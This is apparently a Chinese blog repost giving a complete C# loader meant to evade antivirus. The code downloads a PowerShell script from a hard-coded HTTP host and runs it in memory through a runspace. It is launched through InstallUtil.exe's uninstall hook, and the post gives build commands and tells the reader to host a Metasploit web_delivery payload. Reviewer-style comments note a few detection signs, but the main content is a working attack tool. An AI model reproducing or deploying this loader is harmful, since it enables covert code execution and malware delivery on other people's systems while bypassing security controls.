Csharp使用Pipeline管道来执行PowerShell规避杀软


落地代码如下(完整的 Program.cs,其中的 http://192.168.xxx.xxx/powershell.txt 需要改成实际托管 PowerShell 脚本的地址):

using System;
using System.Net;
using System.IO;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;


/// <summary>
/// Placeholder entry point. Running ps.exe directly does nothing; the code
/// that matters lives in Sample.Uninstall and is only reached when the
/// assembly is driven through InstallUtil.exe /u.
/// </summary>
public class Program
{
    /// <summary>Deliberately empty; kept so csc.exe can emit an .exe.</summary>
    public static void Main()
    {
        // Nothing to do here; uncomment for a quick "did it build" check.
        //Console.WriteLine("test");
    }
}
/// <summary>
/// Installer type whose Uninstall hook is the real entry point of this sample:
/// InstallUtil.exe /u on the compiled assembly (see the build notes below the
/// listing) ends up calling Uninstall, which hands off to Mycode.Exec().
/// Install/Commit/Rollback are not overridden, so a plain "install" pass does
/// nothing visible.
/// </summary>
/// <remarks>
/// NOTE(review): base.Uninstall(savedState) is never called, so any nested
/// installers the base class would normally process are skipped; for this
/// one-type assembly that appears intentional.
/// </remarks>
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    /// <summary>Runs the payload; <paramref name="savedState"/> is ignored.</summary>
    public override void Uninstall(System.Collections.IDictionary savedState) => Mycode.Exec();
}
/// <summary>
/// Downloads a PowerShell script body over plaintext HTTP from the hard-coded
/// URL in Exec() and runs it in-process through a System.Management.Automation
/// runspace, so no powershell.exe child process is spawned. Pipeline output and
/// error records are echoed to stdout once the script has finished.
/// </summary>
/// <remarks>
/// Review notes:
/// - The script is fetched over HTTP with no TLS, signature or hash check, so
///   whatever the server (or anyone on the path) returns is what gets executed.
/// - Nothing is disposed: the WebClient, Stream, StreamReader and Runspace are
///   all left open. Harmless for a one-shot run, a leak if Exec() is called
///   more than once in a process.
/// - NOTE(review): RunspaceConfiguration is marked obsolete in newer PowerShell
///   SDKs in favour of InitialSessionState; confirm against the referenced
///   System.Management.Automation.dll version before changing it.
/// - Observable side effects for defenders: the hosting process (InstallUtil.exe
///   in this write-up) loads System.Management.Automation.dll, an outbound HTTP
///   GET to the script URL is made, and — presumably, since the script runs in
///   the normal engine — PowerShell script-block logging still applies if it is
///   enabled; verify in your own environment.
/// </remarks>
public class Mycode
{
    /// <summary>
    /// Fetch the script, execute it in a fresh runspace, then print its output
    /// and error streams. Blocks until the pipeline has left the Running and
    /// Stopping states; there is no timeout.
    /// </summary>
    public static void Exec()
    {
        WebClient client = new WebClient();
        // Download the script text; the URL is hard-coded and the response
        // body is used verbatim as PowerShell source.
        Stream stream = client.OpenRead("http://192.168.xxx.xxx/powershell.txt");
        StreamReader reader = new StreamReader(stream);
        String command = reader.ReadToEnd();
        //String command = "powershell.exe -c calc";
        //Console.WriteLine(text);

        //string command = System.IO.File.ReadAllText(text);
        // Default runspace configuration: the standard cmdlets and providers,
        // plus whatever policy the engine applies on this host.
        RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
        Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
        rspace.Open();
        Pipeline pipeline = rspace.CreatePipeline();
        // Added as a script block rather than a single command, so the
        // downloaded text may be arbitrary multi-line PowerShell.
        pipeline.Commands.AddScript(command);
        pipeline.InvokeAsync();
        // Busy-wait in 50 ms polls until the pipeline is no longer running or
        // stopping. No timeout: a script that never returns blocks here forever.
        while (pipeline.PipelineStateInfo.State == PipelineState.Running || pipeline.PipelineStateInfo.State == PipelineState.Stopping)
        {
            System.Threading.Thread.Sleep(50);
        }
        // Printed only after the script has completed, so this is cosmetic
        // rather than a progress indicator.
        Console.WriteLine("Installing...");

        // Drain the output stream; null records are skipped.
        foreach (object item in pipeline.Output.ReadToEnd())
        {
            if (item != null)
            {
                Console.WriteLine(item.ToString());
            }
        }
        // Drain the error stream. Note these go to stdout, not stderr, so a
        // caller cannot tell output from errors by stream.
        foreach (object item in pipeline.Error.ReadToEnd())
        {
            if (item != null)
            {
                Console.WriteLine(item.ToString());
            }
        }
    }
}

将以上代码保存为 Program.cs 文件后

在 MSF 上使用 exploit/multi/script/web_delivery(target 选 PSH)生成 PowerShell 载荷,并把生成的脚本内容托管为代码中引用的 powershell.txt

>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:ps.exe Program.cs

>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=True /u .\ps.exe

其中 System.Management.Automation.dll 的实际路径可以在 PowerShell 中执行 [psobject].Assembly.Location 查到(不同系统上 GAC 中的版本目录可能不同,以查询结果为准)

具体步骤如下图

VirusTotal 查杀结果(见图;注意 VT 结果只反映上传当时的静态检测情况,并且上传的样本会分发给各厂商)

文章摘选自神风师傅的博客 百度搜索 神风的博客即可看到
